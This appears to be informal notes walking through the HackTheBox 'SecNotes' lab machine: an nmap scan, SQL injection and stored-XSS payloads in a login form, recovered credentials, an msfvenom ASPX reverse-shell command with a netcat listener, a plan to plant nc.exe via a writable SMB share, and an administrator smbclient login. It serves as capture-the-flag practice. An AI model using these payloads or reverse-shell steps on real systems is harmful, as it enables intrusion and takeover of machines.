┌──(root💀kali)-[~/Documents/hackthebox/secnotes]
└─# nmap -T4 -A -p- 10.10.10.97
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-02 10:46 EDT
Nmap scan report for 10.10.10.97
Host is up (0.025s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
| http-title: Secure Notes - Login
|_Requested resource was login.php
|_http-server-header: Microsoft-IIS/10.0
445/tcp open microsoft-ds Windows 10 Enterprise 17134 microsoft-ds (workgroup: HTB)
8808/tcp open http Microsoft IIS httpd 10.0
|_http-title: IIS Windows
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows XP|7 (89%)
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_7
Aggressive OS guesses: Microsoft Windows XP SP3 (89%), Microsoft Windows XP SP2 (86%), Microsoft Windows 7 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: SECNOTES; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2022-04-02T14:50:46
|_ start_date: N/A
| smb-os-discovery:
| OS: Windows 10 Enterprise 17134 (Windows 10 Enterprise 6.3)
| OS CPE: cpe:/o:microsoft:windows_10::-
| Computer name: SECNOTES
| NetBIOS computer name: SECNOTES\x00
| Workgroup: HTB\x00
|_ System time: 2022-04-02T07:50:47-07:00
|_clock-skew: mean: 2h22m41s, deviation: 4h02m32s, median: 2m39s
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 24.69 ms 10.10.14.1
2 24.84 ms 10.10.10.97
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 150.12 seconds
Port 80
So we keep it aside tyler@secnotes.htb we can also edit our /etc/hosts file and add 10.10.10.97 secnotes.htb in it
No sqli in the login
So we need to investigate the username parameter and see if it might be vulnerable to sqli
We even get a user and password: tyler / 92g!mA8BGjOirkL%OG*& along with what looks like an smb folder so definetely worth trying to connect there \\secnotes.htb\new-site
SMB
┌──(root💀kali)-[~/Documents/hackthebox/secnotes]
└─# smbclient \\\\10.10.10.97\\new-site -U tyler
smb: \> download test.txt
download: command not found
smb: \> put test.txt
putting file test.txt as \test.txt (0.0 kb/s) (average 0.0 kb/s)
smb: \> ls
. D 0 Sat Apr 2 17:04:06 2022
.. D 0 Sat Apr 2 17:04:06 2022
iisstart.htm A 696 Thu Jun 21 11:26:03 2018
iisstart.png A 98757 Thu Jun 21 11:26:03 2018
test.txt A 0 Sat Apr 2 17:04:06 2022
7736063 blocks of size 4096. 3395585 blocks available
We get to a share that hosts the default files of the webserver on port 8808. We have write rights (you can see above that I was able to download a test file) so we could use and aspx reverse shell msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=5555 -f aspx > shell.aspx
We put it on the share put shell.aspx
We launch on listener rlwrap nc -lvp 5555
We browse to our reverse shell from the website - does not work :$ - our file are deleted
Let's try to put /usr/share/windows-resources/binaries/nc.exe in it
We can then make a php file that will launch nc and connect it to our machine so that we get a reverse shell:
There is also a message disclosing an email address
Let's try on the register if we register a user with username <script>alert(1)</script> when we login with it after we have a stored xss:
Let's try with this ' or 1=1; -- we get an internal server error when trying to login with this after but if we register with 'OR 1 OR' it actually works and we get all the tickets
We can then browse to the page, and we get a shell
Let's launch the bash to get the shell
Let's spawn a tty shell
smbclient -U 'administrator%u6!4ZwgwOM#^OBf#Nwnh' \\\\10.10.10.97\\c$ And it works! We can actually connect as administrator to an smb share we just need to grab the flag